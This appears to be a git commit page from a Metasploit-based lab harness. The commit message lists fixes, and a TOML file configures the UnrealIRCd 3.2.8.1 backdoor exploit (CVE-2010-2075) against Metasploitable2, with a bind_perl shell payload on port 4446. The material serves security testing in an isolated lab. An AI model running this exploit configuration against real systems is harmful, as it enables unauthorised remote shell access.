Elliott Kolden
b73f5559dc
Bug 10: _wait_for_tcp returned on recv()→b'' (connection closed by peer),
falsely signalling service-ready. Only socket.timeout or non-empty data
are genuine ready signals; b'' now retries.
Bug 11: distccd_command_exec and unreal_ircd_3281_backdoor incorrectly
had requires_bridge=true. bind_perl payloads connect inward (host→guest
via hostfwd), not outward — no bridge egress needed. Both modules now
run on SLIRP-only fleet slots.
Bug 12: msgpack.unpackb crashed on integer session IDs from msfrpcd 6.x
(strict_map_key=True default). Added strict_map_key=False.
Bug 13 (documented): samba_usermap_script removed from catalog (NoReply
on every fire — already handled in dca6144 on origin/main).
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
28 lines
649 B
TOML
28 lines
649 B
TOML
description = """
|
|
UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075). A modified release
|
|
shipped to the official mirrors carried a backdoor that runs an
|
|
arbitrary command on receipt of a magic AB; payload string. Once
|
|
the backdoor was discovered the official tarball was pulled, but
|
|
Metasploitable2 still ships the trojaned build. Returns a shell on
|
|
the IRC user.
|
|
"""
|
|
|
|
[module]
|
|
type = "exploit"
|
|
path = "unix/irc/unreal_ircd_3281_backdoor"
|
|
|
|
[module.options]
|
|
RHOSTS = "{{ target_ip }}"
|
|
RPORT = 6667
|
|
|
|
[payload]
|
|
path = "cmd/unix/bind_perl"
|
|
[payload.options]
|
|
LPORT = 4446
|
|
|
|
[session]
|
|
type = "shell"
|
|
|
|
[runtime]
|
|
requires_bridge = false
|
|
extra_target_ports = [4446]
|